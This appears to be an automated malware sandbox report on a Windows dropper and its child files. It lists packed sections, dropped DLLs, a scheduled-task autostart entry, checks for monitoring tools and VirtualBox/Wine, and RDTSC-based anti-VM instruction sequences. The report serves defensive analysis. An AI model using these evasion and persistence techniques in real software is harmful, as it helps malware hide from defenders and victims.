Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCDB536 push ecx; ret 0_2_6CCDB549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C0D82C push ecx; ret 11_2_00C0D83F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F962790 push 7F960002h; ret 13_2_7F96279F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960C90 push 7F960002h; ret 13_2_7F960C9F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960F90 push 7F960002h; ret 13_2_7F960F9F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961290 push 7F960002h; ret 13_2_7F96129F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961590 push 7F960002h; ret 13_2_7F96159F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961890 push 7F960002h; ret 13_2_7F96189F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961B90 push 7F960002h; ret 13_2_7F961B9F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961E90 push 7F960002h; ret 13_2_7F961E9F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F962190 push 7F960002h; ret 13_2_7F96219F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F962490 push 7F960002h; ret 13_2_7F96249F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F962880 push 7F960002h; ret 13_2_7F96288F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F962580 push 7F960002h; ret 13_2_7F96258F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960A80 push 7F960002h; ret 13_2_7F960A8F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960D80 push 7F960002h; ret 13_2_7F960D8F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961080 push 7F960002h; ret 13_2_7F96108F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961380 push 7F960002h; ret 13_2_7F96138F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961680 push 7F960002h; ret 13_2_7F96168F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961980 push 7F960002h; ret 13_2_7F96198F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961C80 push 7F960002h; ret 13_2_7F961C8F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F961F80 push 7F960002h; ret 13_2_7F961F8F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F962280 push 7F960002h; ret 13_2_7F96228F
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F9628B0 push 7F960002h; ret 13_2_7F9628BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F9625B0 push 7F960002h; ret 13_2_7F9625BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960AB0 push 7F960002h; ret 13_2_7F960ABF
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960DB0 push 7F960002h; ret 13_2_7F960DBF
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F9610B0 push 7F960002h; ret 13_2_7F9610BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F9613B0 push 7F960002h; ret 13_2_7F9613BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F9616B0 push 7F960002h; ret 13_2_7F9616BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F9619B0 push 7F960002h; ret 13_2_7F9619BF
Source: Zachv5lCuu.exe Static PE information: section name: entropy: 7.994867359206323
Source: Zachv5lCuu.exe Static PE information: section name: entropy: 7.979281108132543
Source: Zachv5lCuu.exe Static PE information: section name: entropy: 7.9547601540744886
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name: entropy: 7.980908354134591
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name: vtxlewez entropy: 7.955312989748896
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.980908354134591
Source: amadka[1].exe.0.dr Static PE information: section name: vtxlewez entropy: 7.955312989748896
Source: explorti.exe.9.dr Static PE information: section name: entropy: 7.980908354134591
Source: explorti.exe.9.dr Static PE information: section name: vtxlewez entropy: 7.955312989748896
Source: random[1].exe.11.dr Static PE information: section name: entropy: 7.994867359206323
Source: random[1].exe.11.dr Static PE information: section name: entropy: 7.979281108132543
Source: random[1].exe.11.dr Static PE information: section name: entropy: 7.9547601540744886
Source: 25bb638aac.exe.11.dr Static PE information: section name: entropy: 7.994867359206323
Source: 25bb638aac.exe.11.dr Static PE information: section name: entropy: 7.979281108132543
Source: 25bb638aac.exe.11.dr Static PE information: section name: entropy: 7.9547601540744886
Drops PE files
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\amadka[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD055F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6CD055F0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 6DEC0B second address: 6DEC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 6DEC0F second address: 6DEC19 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 6DEC19 second address: 6DEC1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 6DEC1F second address: 6DEC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84C54A second address: 84C54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84C54E second address: 84C558 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84C558 second address: 84C55D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84C55D second address: 84C572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007FBF8C4F2092h 0x0000000d jnc 00007FBF8C4F2086h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860A28 second address: 860A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860B95 second address: 860BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860BA2 second address: 860BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860D04 second address: 860D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860E62 second address: 860E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A57h 0x00000009 js 00007FBF8C4F2A46h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860E84 second address: 860E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860E89 second address: 860E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860FD5 second address: 860FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860FD9 second address: 860FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860FDF second address: 860FE4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8641C1 second address: 8641C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8641C5 second address: 8641CB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8641CB second address: 86420A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, dword ptr [ebp+122D1E69h] 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D3A9Bh], edi 0x00000018 mov dword ptr [ebp+122D1C10h], edi 0x0000001e call 00007FBF8C4F2A49h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 86420A second address: 864211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864211 second address: 864217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864217 second address: 864236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBF8C4F2094h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864236 second address: 864240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FBF8C4F2A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864240 second address: 864251 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864337 second address: 86433B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 86433B second address: 864345 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864459 second address: 864473 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864473 second address: 864496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jg 00007FBF8C4F2086h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864496 second address: 8644C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF8C4F2A58h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8644C0 second address: 8644FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edi 0x00000009 popad 0x0000000a pop eax 0x0000000b jmp 00007FBF8C4F208Bh 0x00000010 lea ebx, dword ptr [ebp+12459045h] 0x00000016 or dx, 077Ah 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e je 00007FBF8C4F2099h 0x00000024 jmp 00007FBF8C4F2093h 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8644FD second address: 864503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8645B7 second address: 8645BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 874F28 second address: 874F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 859A9F second address: 859AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 859AA3 second address: 859ACF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A50h 0x00000007 jl 00007FBF8C4F2A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 jnp 00007FBF8C4F2A46h 0x00000018 pop edi 0x00000019 jng 00007FBF8C4F2A4Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 859ACF second address: 859ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8832E7 second address: 883318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FBF8C4F2A4Fh 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FBF8C4F2A4Fh 0x00000015 jnc 00007FBF8C4F2A46h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883454 second address: 88345F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88345F second address: 883465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
